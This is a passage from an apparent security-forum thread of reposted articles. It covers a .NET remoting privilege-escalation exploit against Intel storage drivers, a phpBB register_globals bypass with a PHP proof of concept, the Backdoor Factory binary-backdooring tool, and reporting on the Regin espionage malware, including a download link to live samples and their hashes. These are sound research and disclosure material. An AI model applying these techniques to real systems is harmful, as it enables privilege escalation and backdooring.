It's job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, calling the server and finally packaging up the return value into the IMethodReturnMessage object. This is a very high level overview, but we'll see how this all interacts soon. The Exploit Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method: IMessage requestMsg; if (this.TypeFilterLevel != TypeFilterLevel.Full) { set = new PermissionSet(PermissionState.None); set.SetPermission( new SecurityPermission(SecurityPermissionFlag.SerializationFormatter)); } try { if (set != null) { set.PermitOnly(); } requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream, _strictBinding, TypeFilterLevel); } finally { if (set != null) { CodeAccessPermission.RevertPermitOnly(); } } We can see in this code that the request data from the transport is thrown into the DeserializeBinaryRequestMessage. The code around it is related to the serialization type filter level which I'll describe later. So what's the method doing? internal static IMessage DeserializeBinaryRequestMessage(string objectUri, Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel) { BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding); formatter.FilterLevel = securityLevel; UriHeaderHandler handler = new UriHeaderHandler(objectUri); return (IMessage) formatter.UnsafeDeserialize(inputStream, new HeaderHandler(handler.HeaderHandler)); } For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. 
Any result is passed back to the client. So now for the bug, it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client. But why would this be useful? Well it turns out there's a Time-of-Check Time-of-Use vulnerability if an attacker could return different results for the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) at some points it will trick the server into dispatching the call. Now once the StackBuilder sink goes to dispatch the method we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code to execute in the remoting service. In order to actually exploit this you pretty much need to implement most of the remoting code manually, fortunately it is documented so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommend taking a look at the github project for more information on how this all works. So that was CVE-2014-1806, but what about CVE-2014-4149? Well it's the same bug, MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM Interop and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we instead inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally as then you don't need to worry so much about COM authentication but it should work remotely. 
The final fix was to check if the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject is derived from that class as well as transparent proxies. Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then using reflecting object tricks you can capture FileInfo or DirectoryInfo objects which give access to the filesystem at the privileges of the server. The reason you can do this is these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client it ends up staying in the server as a remote object. Real-World Example Okay let's see this in action in a real world application. I bought a computer a few years back which had pre-installed the Intel Rapid Storage Technology drivers version 11.0.0.1032 (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue, from what I can tell the latest versions of these drivers no longer uses .NET remoting for the communication between the user client and the server so I've never contacted Intel about the issue. 
That said there's no automatic update process so if, like me, you had the original insecure version installed well you have a trivial local privilege escalation on your machine. Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below: public void Start() { BinaryServerFormatterSinkProvider serverSinkProvider = new BinaryServerFormatterSinkProvider { TypeFilterLevel = TypeFilterLevel.Full }; BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider(); IdentityReferenceCollection groups = new IdentityReferenceCollection(); IDictionary properties = new Hashtable(); properties["portName"] = "ServerChannel"; properties["includeVersions"] = "false"; mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider); ChannelServices.RegisterChannel(mChannel, true); mServerRemotingRef = RemotingServices.Marshal(mServer, "Server.rem", typeof(IServer)); mEngine.Start(); } So there's a few things to note about this code, it is using IpcChannel so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel, this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to True and finally it configures an object with the known name of Server.rem which will be exposed on the channel. Also worth noting it is setting the TypeFilterLevel to Full, we'll get back to that in a minute. For exploitation purposes therefore we can build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149 so we need to pass the -usecom flag to use a COM return channel. Well that was easy, direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. 
Fortunately though I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead: In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from. Mitigating Against Attacks I can't be 100% certain there aren't other ways of exploiting this sort of bug, at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still there are definitely a few ways of mitigating it. One is to not use remoting, MS has deprecated the technology for WCF, but it isn't getting rid of it yet. If you have to use remoting you could use secure mode with user account checking. Also if you have complete control over the environment you could randomise the service name per-deployment which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels. Posted by tiraniddo at 15:14 Sursa: Tyranid's Lair: Stupid is as Stupid Does When It Comes to .NET Remoting
  8. phpBB <= 3.1.1 deregister_globals() Function Bypass phpBB <= 3.1.1 deregister_globals() Function Bypass Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.11.18 When PHP's register_globals configuration directive set on, phpBB will call deregister_globals() function, all global variables registered by PHP will be destroyed. But deregister_globals() functions can be bypassed. ``` $input = array_merge( array_keys($_GET), array_keys($_POST), array_keys($_COOKIE), array_keys($_SERVER), array_keys($_SESSION), array_keys($_ENV), array_keys($_FILES) ); foreach ($input as $varname) { if (isset($not_unset[$varname])) { if ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) || isset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) || isset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) || isset($_FILES['GLOBALS'])) { exit; } else { $cookie = &$_COOKIE; while (isset($cookie['GLOBALS'])) { if (!is_array($cookie['GLOBALS'])) { break; } .... } } unset($GLOBALS[$varname]); } ``` In the above code we see, when request $_COOKIE['GLOBALS'] = 1, $GLOBALS['GLOBALS'] will be destroyed by unset(). This means $GLOBALS array will be destroyed. This also means you will not be able to use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. Because the binding between the $GLOBALS array and the global symbol table has been broken. All global variables registered by PHP form $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will be not unregistered. Proof of Concept ``` $_COOKIE['GLOBALS'] = 1; $_COOKIE['ryat'] = $ryat = 'ryat'; deregister_globals(); var_dump($GLOBALS); var_dump($ryat); $GLOBALS['ryat'] = 'hi'; var_dump($GLOBALS); var_dump($ryat); ``` P.S. I had reported the issue to the phpBB developers, but they do not consider this a security issue. Sursa: http://80vul.com/phpbb/vul.txt
  9. [h=2]The Backdoor Factory (BDF)[/h] For security professionals and researchers only. The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. DerbyCon 2014 Presentation: Contact the developer on: IRC: irc.freenode.net #BDFactory Twitter: @Midnite_runr Under a BSD 3 Clause License See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki Dependencies: Capstone, using the 'next' repo until it is the 'master' repo: https://github.com/aquynh/capstone/tree/next Pefile, most recent: https://code.google.com/p/pefile/ INSTALL: ./install.sh This will install Capstone with the 'next' repo and use pip to install pefile. UPDATE: ./update.sh Supporting: Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), and Mach-O x86/x64 and those formats in FAT files Packed Files: PE UPX x86/x64 Experimental: OpenBSD x32 Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I'm on the verge of bypassing NSIS, so bypassing these checks will be included in the future. Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org-- Without him, I would still be trying to do stupid things with the elf format. Also thanks to Silvio Cesare with his 1998 paper (Silvio Cesare 'Unix ELF parasites and virus' (VX heaven)) which these ELF patching techniques are based on. From DerbyCon: Video: Injection Module Demo: Slides: Patching Windows Executables with the Backdoor Factory | DerbyCon 2013 Sursa: https://github.com/secretsquirrel/the-backdoor-factory
  10. Regin: Giving IT security reason to hope NSA is waaaay ahead on malware Computerworld | Nov 24, 2014 11:20 AM PT Security pros don't need screaming headlines to put them on alert about a dangerous new piece of malware."New" and "present" are usually enough to do it, though "stealthy" and "nasty" will open their eyes a little wider. So think what the impact would be of this snippet about a new bit of malware called Regin that Symantec Corp. announced over the weekend: "In the world of malware threats, only a few rare examples can truly be considered groundbreaking and almost peerless," reads the opening sentence of Symantec's white paper on Regin." What we have seen in Regin is just such a class of malware." The phrase "class of malware," in this case referred to the sophistication level of the software, not its origin or intent – which appears to be long-term corporate and political espionage committed by a major national intelligence agency. Regin's architecture is so complex and programming so sophisticated, Symantec researchers concluded, that it is most likely to have been developed by a state-sponsored intelligence agency like the NSA or CIA, rather than hackers or malware writers motivated by profit or commercial developers such as the Italian company Hacking Team that sell software designed for espionage to governments and law enforcement agencies worldwide. Far more important than the polish or architecture on the newly discovered malware, however, is the consistency in targets and approach, which are similar to those of previously identified apps designed for international espionage and sabotage including Stuxnet, Duqu, Flamer, Red October and Weevil – all of which have been blamed on the U.S. 
National Security Agency or CIA, though only Stuxnet has been confirmed to have been developed by the U.S "Its capabilities and the level of resources behind Regin indicate that it is one of the main cyber-espionage tools used by a nation state," according to Symantec's report, which did not suggest which state might have been responsible. But who? "The best clues we have are where the infections have occurred and where they have not," Symantec researcher Liam O'Murchu told Re/Code in an interview yesterday. There have been no Regin attacks on either China or the U.S. Russia was the target of 28 percent of attacks; Saudi Arabia (a U.S. ally with which relations are often tense) was the target of 24 percent of Regin attacks. Mexico and Ireland each netted 9 percent of attacks. India, Afghanistan, Iran, Belgium, Austria and Pakistan got 5 percent apiece, according to Symantec's breakdown. Nearly half of attacks were aimed at "private individuals and small businesses;" telecom and Internet backbone companies were the target of 28 percent of attacks, though they likely served only as a way for Regin to get to businesses it had actually targeted, O'Murchu told Re/Code. "It looks like it comes from a Western organization," Symantec researcher Sian John told the BBC. "It's the level of skill and expertise, the length of time over which it was developed." The approach of Regin resembles Stuxnet less than it does Duqu, a sly, shape-shifting Trojan designed to "steal everything" according to a 2012 Kaspersky Lab analysis. One consistent feature that led to John's conclusion is the hide-and-stay-resident design of Regin, which is consistent for an organization wanting to monitor an infected organization for years rather than penetrate, grab a few files and move on to the next target – a pattern that is more consistent with the approach of the known cyberspy organizations of China's military than with that of the U.S. 
Stuxnet and Duqu showed obvious similarities in design China's cyberespionage style is much more smash-and-grab, according to security firm FireEye, Inc., whose 2013 report "APT 1: Exposing One of China's Cyber Espionage Units" detailed a persistent pattern of attack using malware and spear phishing that allowed one unit of the People's Liberation Army to steal "hundreds of terabytes of data from at least 141 organizations." It's unlikely the incredibly obvious attacks of PLA Unit 61398 – five of whose officers were the subject of an unprecedented espionage indictment of active-duty members of a foreign military by the U.S. Department of Justice earlier this year – are the only cyberspies in China, or that its lack of subtlety is characteristic of all Chinese cyberespionage efforts. Though its efforts at cyberespionage are less well known than those of either the U.S. or China, Russia has a healthy cyber-spy and malware-producing operation of its own. Malware known as APT28 has been traced to "a government sponsor based in Moscow," according to an October, 2014 report from FireEye. The report described APT28 as "collecting intelligence that would be useful to a government," meaning data on foreign militaries, governments and security organizations, especially those of former Soviet Bloc countries and NATO installations. The important thing about Regin – at least to corporate infosecurity people – is that the risk that it will be used to attack any U.S.-based corporation is low. The important thing to everyone else is that Regin is another bit of evidence of an ongoing cyberwar among the big three superpowers and a dozen or so secondary players, all of whom want to demonstrate they've got game online, none of which want a demonstration so extravagant it will expose all their cyber powers or prompt a physical attack in response to a digital one. 
It also pushes the envelope of what we knew was possible from a bit of malware whose primary goal is to remain undetected so it can spy for a long time. The ways it accomplishes that are easily clever enough to inspire admiration of its technical accomplishments – but only from those who don't have to worry about having to detect, fight or eradicate malware that qualifies for the same league as Regin and Stuxnet and Duqu, but plays for another team. Sursa: Regin: Giving IT security reason to hope NSA is waaaay ahead on malware | Computerworld
  11. Highly advanced backdoor trojan cased high-profile targets for years "Backdoor Regin" bears a resemblance to Stuxnet, was developed by a wealthy nation. by Dan Goodin - Nov 23 2014, 7:01pm GTBST Enlarge / The five stages of Regin. Symantec Researchers have unearthed highly advanced malware they believe was developed by a wealthy nation-state to spy on a wide range of international targets in diverse industries, including hospitality, energy, airline, and research. Backdoor Regin, as researchers at security firm Symantec are referring to the trojan, bears some resemblance to previously discovered state-sponsored malware, including the espionage trojans known as Flame and Duqu, as well as Stuxnet, the computer worm and trojan that was programmed to disrupt Iran's nuclear program. Regin likely required months or years to be completed and contains dozens of individual modules that allowed its operators to tailor the malware to individual targets. To remain stealthy, the malware is organized into five stages, each of which is encrypted except for the first one. Executing the first stage triggers a domino chain in which the second stage is decrypted and executed, and that in turn decrypts the third stage, and so on. Analyzing and understanding the malware requires researchers to acquire all five stages. Regin contains dozens of payloads, including code for capturing screenshots, seizing control of an infected computer's mouse, stealing passwords, monitoring network traffic, and recovering deleted files. Other modules appear to be tailored to specific targets. One such payload included code for monitoring the traffic of a Microsoft IIS server. Another sniffed the traffic of mobile telephone base station controllers. Symantec researchers believe Regin was a sprawling framework that was used in multiple campaigns that date back to 2008 and possibly several years earlier. 
Liam O'Murchu, manager of operations for Symantec Security Response, told Ars that the roster of modules used against one target was often unique, an indication that Regin was used in multiple campaigns. "Essentially, what we think we're looking at is different campaigns where in one infection they needed to sniff your keyboard whereas in another infection they wanted to grab the user name and password of the admin connected to a base station controller," O'Murchu said. While almost half of the computers known to be infected by Regin were inside Internet service providers, Symantec believes they were attacked so the operators could spy on specific customers who used the ISPs. Similarly, telecommunication backbone providers, which at 28 percent accounted for the second biggest category of infected computers, were likely chosen so attackers could gain access to calls being routed through their infrastructure. There is still much Symantec doesn't know about Regin. So far, company researchers are aware of only about 100 infections, a number that seems small for such a sprawling framework of malware. The researchers have yet to uncover the command and control system the attackers used to communicate with infected computers, and they still don't have any educated hunches about the country behind the malware. The malware is known to have been active from 2008 until 2011, when it was abruptly pulled by its operators for unknown reasons. Regin, which is the name Microsoft assigned to the underlying trojan, resurfaced in 2013. Symantec researchers became aware of the malware in December of that year. Sursa: Highly advanced backdoor trojan cased high-profile targets for years | Ars Technica
  12. UK, US behind Regin malware, attacked European Union networks Summary: Two governments working together are said to have developed the state-sponsored malware that attacked the European Union. Guess what? One of the makers was an EU country. By Zack Whittaker for Zero Day | November 24, 2014 -- 18:12 GMT (10:12 PST) Blame the British and American spy agencies for the latest state-sponsored malware attack, say reporters at The Intercept. The publication, which in the wake of Glenn Greenwald's departure from The Guardian continued to publish documents leaked by Edward Snowden, said on Monday the recently discovered malware, known as Regin, was used against targets in the European Union. One of those targets included Belgian telecommunications company Belgacom, which had its networks broken into by the British spy agency the Government Communications Headquarters (GCHQ). Regin was first publicly talked about over the weekend after Symantec discovered the "sophisticated" malware, though is understood to have been in circulation since 2008. Compared to Stuxnet, the state-sponsored malware whose creators have never been confirmed, the recently-discovered trojan steals data from machines and networks it infects, disguised as Microsoft software. Some began to point the finger at Russia and China, but these were quickly discounted by industry experts. Others suspected the U.S. and Israel — a deal already exists that allows the Middle Eastern allied state to access raw and "unchecked" U.S. collected intelligence. They weren't far off. According to Monday's report, the U.S. working in conjunction with Britain, a European member state (though perhaps not for much longer) attacked Belgacom using the Regin malware. Though the Belgacom hack was disclosed by Snowden's leaks, the malware used had never been revealed. The new details from The Intercept show how GCHQ embarked upon its "hacking mission," known as Operation Socialist, by accessing Belgacom's networks in 2010. 
By targeting engineers through a faked LinkedIn page, GCHQ was able to get deep inside the Internet provider to steal data. One of Belgacom's main clients was the European Commission, the European Parliament, and the European Council of member state leaders. Exactly how member states of the European Union — there are 28 of them including the U.K. — will react to one of its own member states launching a successful hacking attack against their executive body, remains unknown. But while members of the Parliament and Commission staff have, over the years, seen the U.S. as one of the greatest threats to the region's data protection and privacy policies, they should have been looking a little closer to home. Sursa: UK, US behind Regin malware, attacked European Union networks | ZDNet
  13. Secret Malware in European Union Attack Linked to U.S. and British Intelligence By Morgan Marquis-Boire, Claudio Guarnieri, and Ryan Gallagher Complex malware known as Regin is the suspected technology behind sophisticated cyberattacks conducted by U.S. and British intelligence agencies on the European Union and a Belgian telecommunications company, according to security industry sources and technical analysis conducted by The Intercept. Regin was found on infected internal computer systems and email servers at Belgacom, a partly state-owned Belgian phone and internet provider, following reports last year that the company was targeted in a top-secret surveillance operation carried out by British spy agency Government Communications Headquarters, industry sources told The Intercept. The malware, which steals data from infected systems and disguises itself as legitimate Microsoft software, has also been identified on the same European Union computer systems that were targeted for surveillance by the National Security Agency. The hacking operations against Belgacom and the European Union were first revealed last year through documents leaked by NSA whistleblower Edward Snowden. The specific malware used in the attacks has never been disclosed, however. The Regin malware, whose existence was first reported by the security firm Symantec on Sunday, is among the most sophisticated ever discovered by researchers. Symantec compared Regin to Stuxnet, a state-sponsored malware program developed by the U.S. and Israel to sabotage computers at an Iranian nuclear facility. Sources familiar with internal investigations at Belgacom and the European Union have confirmed to The Intercept that the Regin malware was found on their systems after they were compromised, linking the spy tool to the secret GCHQ and NSA operations. 
Ronald Prins, a security expert whose company Fox IT was hired to remove the malware from Belgacom’s networks, told The Intercept that it was “the most sophisticated malware” he had ever studied. “Having analyzed this malware and looked at the [previously published] Snowden documents,” Prins said, “I’m convinced Regin is used by British and American intelligence services.” A spokesman for Belgacom declined to comment specifically about the Regin revelations, but said that the company had shared “every element about the attack” with a federal prosecutor in Belgium who is conducting a criminal investigation into the intrusion. “It’s impossible for us to comment on this,” said Jan Margot, a spokesman for Belgacom. “It’s always been clear to us the malware was highly sophisticated, but ever since the clean-up this whole story belongs to the past for us.” In a hacking mission codenamed Operation Socialist, GCHQ gained access to Belgacom’s internal systems in 2010 by targeting engineers at the company. The agency secretly installed so-called malware “implants” on the employees’ computers by sending their internet connection to a fake LinkedIn page. The malicious LinkedIn page launched a malware attack, infecting the employees’ computers and giving the spies total control of their systems, allowing GCHQ to get deep inside Belgacom’s networks to steal data. The implants allowed GCHQ to conduct surveillance of internal Belgacom company communications and gave British spies the ability to gather data from the company’s network and customers, which include the European Commission, the European Parliament, and the European Council. The software implants used in this case were part of the suite of malware now known as Regin. One of the keys to Regin is its stealth: To avoid detection and frustrate analysis, malware used in such operations frequently adhere to a modular design. 
This involves the deployment of the malware in stages, making it more difficult to analyze and mitigating certain risks of being caught. Based on an analysis of the malware samples, Regin appears to have been developed over the course of more than a decade; The Intercept has identified traces of its components dating back as far as 2003. Regin was mentioned at a recent Hack.lu conference in Luxembourg, and Symantec’s report on Sunday said the firm had identified Regin on infected systems operated by private companies, government entities, and research institutes in countries such as Russia, Saudi Arabia, Mexico, Ireland, Belgium, and Iran. The use of hacking techniques and malware in state-sponsored espionage has been publicly documented over the last few years: China has been linked to extensive cyber espionage, and recently the Russian government was also alleged to have been behind a cyber attack on the White House. Regin further demonstrates that Western intelligence agencies are also involved in covert cyberespionage. GCHQ declined to comment for this story. The agency issued its standard response to inquiries, saying that “it is longstanding policy that we do not comment on intelligence matters” and “all of GCHQ’s work is carried out in accordance with a strict legal and policy framework, which ensures that our activities are authorised, necessary and proportionate.” The NSA said in a statement, “We are not going to comment on The Intercept’s speculation.” The Intercept has obtained samples of the malware from sources in the security community and is making it available for public download in an effort to encourage further research and analysis. (To download the malware, click here. The file is encrypted; to access it on your machine use the password “infected.”) What follows is a brief technical analysis of Regin conducted by The Intercept’s computer security staff. 
Regin is an extremely complex, multi-faceted piece of work and this is by no means a definitive analysis. In the coming weeks, The Intercept will publish more details about Regin and the infiltration of Belgacom as part of an investigation in partnership with Belgian and Dutch newspapers De Standaard and NRC Handelsblad. Origin of Regin In Nordic mythology, the name Regin is associated with a violent dwarf who is corrupted by greed. It is unclear how the Regin malware first got its name, but the name appeared for the first time on the VirusTotal website on March 9th 2011. Der Spiegel reported that, according to Snowden documents, the computer networks of the European Union were infiltrated by the NSA in the months before the first discovery of Regin. Industry sources familiar with the European Parliament intrusion told The Intercept that such attacks were conducted through the use of Regin and provided samples of its code. This discovery, the sources said, may have been what brought Regin to the wider attention of security vendors. Also on March 9th 2011, Microsoft added related entries to its Malware Encyclopedia: Alert level: Severe First detected by definition: 1.99.894.0 Latest detected by definition: 1.173.2181.0 and higher First detected on: Mar 09, 2011 This entry was first published on: Mar 09, 2011 This entry was updated on: Not available Two more variants of Regin have been added to the Encyclopedia, Regin.B and Regin.C. Microsoft appears to detect the 64-bit variants of Regin as Prax.A and Prax.B. None of the Regin/Prax entries are provided with any sort of summary or technical information. The following Regin components have been identified: Loaders The first stage consists of drivers which act as loaders for a second stage. They have an encrypted block which points to the location of the 2nd stage payload. On NTFS, that is an Extended Attribute Stream; on FAT, they use the registry to store the body. When started, this stage simply loads and executes Stage 2. 
The Regin loaders are disguised as Microsoft drivers with names such as: serial.sys cdaudio.sys atdisk.sys parclass.sys usbclass.sys Mimicking Microsoft drivers allows the loaders to better disguise their presence on the system and appear less suspicious to host intrusion detection systems. Second stage loader When launched, it cleans traces of the initial loader, loads the next part of the toolkit and monitors its execution. On failure, Stage 2 is able to disinfect the compromised device. The malware zeroes out its PE (Portable Executable, the Windows executable format) headers in memory, replacing “MZ” with its own magic marker 0xfedcbafe. Orchestrator This component consists of a service orchestrator working in Windows’ kernel. It initializes the core components of the architecture and loads the next parts of the malware. Information Harvesters This stage is composed of a service orchestrator located in user land, provided with many modules which are loaded dynamically as needed. These modules can include data collectors, a self-defense engine which detects attempts to detect the toolkit, functionality for encrypted communications, network capture programs, and remote controllers of different kinds. Stealth Implant The Intercept’s investigation revealed a sample uploaded on VirusTotal on March 14th 2012 that presents the unique 0xfedcbafe header, which is a sign that it might have been loaded by a Regin driver and it appears to provide stealth functionality for the tool kit. This picture shows the very first bytes of the sample in question, showing the unique 0xfedcbafe header at the beginning. In order to access information stored in the computer’s memory, programs use objects that reference specific locations in memory called pointers. This binary file contains some such pointers already initialized, which corroborates the hypothesis that the file was dumped from memory during a forensic analysis of a compromised system. 
The sample has the following SHA256 hash: fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129 This sample gives a sense of the sophistication of the actors and the extent of the precautions they have been taking in order to operate as stealthily as possible. When a Windows kernel driver needs to allocate memory to store some type of data, it creates so-called kernel pools. Such memory allocations have specific headers and tags that are used to identify the type of objects contained within the block. For example such tags could be Proc, Thrd or File, which respectively indicate that the given block would contain a process, thread or file object structure. When performing forensic analysis of a computer’s memory, it is common to use a technique called pool scanning to parse the kernel memory, enumerate such kernel pools, identify the type of content and extract it. Just like Regin loader drivers, this driver repeatedly uses the generic “Ddk “ tag with ExAllocatePoolWithTag() when allocating all kernel pools: This picture shows the use of the “ddk “ tag when allocating memory with the Windows ExAllocatePoolWithTag() function. This is the generic tag used throughout the operating system when a proper tag is not specified. This makes it more difficult for forensic analysts to find any useful information when doing pool scanning, since all its memory allocations will mix with many generic others. In addition, when freeing memory using ExFreePool(), the driver zeroes the content, probably to avoid leaving traces in pool memory. The driver also contains routines to check for specific builds of the Windows kernel in use, including very old versions such as for Windows NT4 Terminal Server and Windows 2000, and then adapts its behavior accordingly. Windows kernel drivers operate on different levels of priority, from the lowest PASSIVE_LEVEL to the highest HIGH_LEVEL. 
This level is used by the processor to know which service to give execution priority to and to make sure that the system doesn’t try to allocate used resources which could result in a crash. This Regin driver recurrently checks that the current IRQL (Interrupt Request Level) is set to PASSIVE_LEVEL using the KeGetCurrentIrql() function in many parts of the code, probably in order to operate as silently as possible and to prevent possible IRQL confusion. This technique is another example of the level of precaution the developers took while designing this malware framework. Upon execution of the unload routine (located at 0xFDEFA04A), the driver performs a long sequence of steps to remove remaining traces and artifacts. Belgacom Sample In an interview given to the Belgian magazine Mondiaal Nieuws, Fabrice Clément, head of security of Belgacom, said that the company first identified the attack on June 21, 2013. In the same interview Clément says that the computers targeted by the attackers included staff workstations as well as email servers. These statements confirm the timing and techniques used in the attack. From previously identified Regin samples, The Intercept developed unique signatures which could identify this toolkit. A zip archive with a sample identified as Regin/Prax was found in VirusTotal, a free, online website which allows people to submit files to be scanned by several anti-virus products. The zip archive was submitted on 2013-06-21 07:58:37 UTC from Belgium, the date identified by Clément. Sources familiar with the Belgacom intrusion told The Intercept that this sample was uploaded by a systems administrator at the company, who discovered the malware and uploaded it in an attempt to research what type of malware it was. The archive contains: Along with other files The Intercept found the output of a forensic tool, GetThis, which is being run on target systems looking for malware. 
From the content of the GetThis.log file, we can see that a sample called “svcsstat.exe” and located in C:\Windows\System32\ was collected and a copy of it was stored. The malware in question is “0001000000000C1C_svcsstat.exe_sample ”. This is a 64-bit variant of the aforementioned first stage Regin loader. The archive also contains the output of ProcMon, “Process Monitor”, a system monitoring tool distributed by Microsoft and commonly used in forensics and intrusion analysis. This file identifies the infected system and provides a variety of interesting information about the network. For instance: USERDNSDOMAIN=BGC.NET USERDOMAIN=BELGACOM USERNAME=id051897a USERPROFILE=C:\Users\id051897a The following environment variable shows that the system was provided with a Microsoft SQL server and a Microsoft Exchange server, indicating that it might be one of the compromised corporate mail servers Fabrice Clément mentioned to Mondiaal News: Path=C:\Program Files\Legato\nsr\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Network Monitor 3\;C:\Program Files\System Center Operations Manager 2007\;c:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\;D:\Program Files\Microsoft\Exchange Server\bin Below is a list of hashes for the files The Intercept is making available for download. Given that it has been over a year since the Belgacom operation was publicly outed, The Intercept considers it likely that the GCHQ/NSA has replaced their toolkit and no current operations will be affected by the publication of these samples. 
Regin Samples 32-bit Loaders 20831e820af5f41353b5afab659f2ad42ec6df5d9692448872f3ed8bbb40ab92 7553d4a5914af58b23a9e0ce6a262cd230ed8bb2c30da3d42d26b295f9144ab7 f89549fc84a8d0f8617841c6aa4bb1678ea2b6081c1f7f74ab1aebd4db4176e4 fd92fd7d0f925ccc0b4cbb6b402e8b99b64fa6a4636d985d78e5507bd4cfecef 225e9596de85ca7b1025d6e444f6a01aa6507feef213f4d2e20da9e7d5d8e430 9cd5127ef31da0e8a4e36292f2af5a9ec1de3b294da367d7c05786fe2d5de44f b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047 f1d903251db466d35533c28e3c032b7212aa43c8d64ddf8c5521b43031e69e1e 4e39bc95e35323ab586d740725a1c8cbcde01fe453f7c4cac7cced9a26e42cc9 a0d82c3730bc41e267711480c8009883d1412b68977ab175421eabc34e4ef355 a7493fac96345a989b1a03772444075754a2ef11daa22a7600466adc1f69a669 5001793790939009355ba841610412e0f8d60ef5461f2ea272ccf4fd4c83b823 a6603f27c42648a857b8a1cbf301ed4f0877be75627f6bbe99c0bfd9dc4adb35 8d7be9ed64811ea7986d788a75cbc4ca166702c6ff68c33873270d7c6597f5db 40c46bcab9acc0d6d235491c01a66d4c6f35d884c19c6f410901af6d1e33513b df77132b5c192bd8d2d26b1ebb19853cf03b01d38afd5d382ce77e0d7219c18c 7d38eb24cf5644e090e45d5efa923aff0e69a600fb0ab627e8929bb485243926 a7e3ad8ea7edf1ca10b0e5b0d976675c3016e5933219f97e94900dea0d470abe a0e3c52a2c99c39b70155a9115a6c74ea79f8a68111190faa45a8fd1e50f8880 d42300fea6eddcb2f65ffec9e179e46d87d91affad55510279ecbb0250d7fdff 5c81cf8262f9a8b0e100d2a220f7119e54edfc10c4fb906ab7848a015cd12d90 b755ed82c908d92043d4ec3723611c6c5a7c162e78ac8065eb77993447368fce c0cf8e008fbfa0cb2c61d968057b4a077d62f64d7320769982d28107db370513 cca1850725f278587845cd19cbdf3dceb6f65790d11df950f17c5ff6beb18601 ecd7de3387b64b7dab9a7fb52e8aa65cb7ec9193f8eac6a7d79407a6a932ef69 e1ba03a10a40aab909b2ba58dcdfd378b4d264f1f4a554b669797bbb8c8ac902 392f32241cd3448c7a435935f2ff0d2cdc609dda81dd4946b1c977d25134e96e 9ddbe7e77cb5616025b92814d68adfc9c3e076dddbe29de6eb73701a172c3379 8389b0d3fb28a5f525742ca2bf80a81cf264c806f99ef684052439d6856bc7e7 32-bit Rootkit fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129 
32-bit Orchestrator e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be 64-bit Loader (Belgacom) 4d6cebe37861ace885aa00046e2769b500084cc79750d2bf8c1e290a1c42aaff Photo credit: Winfried Rothermel/AP Sursa: https://firstlook.org/theintercept/2014/11/24/secret-regin-malware-belgacom-nsa-gchq/
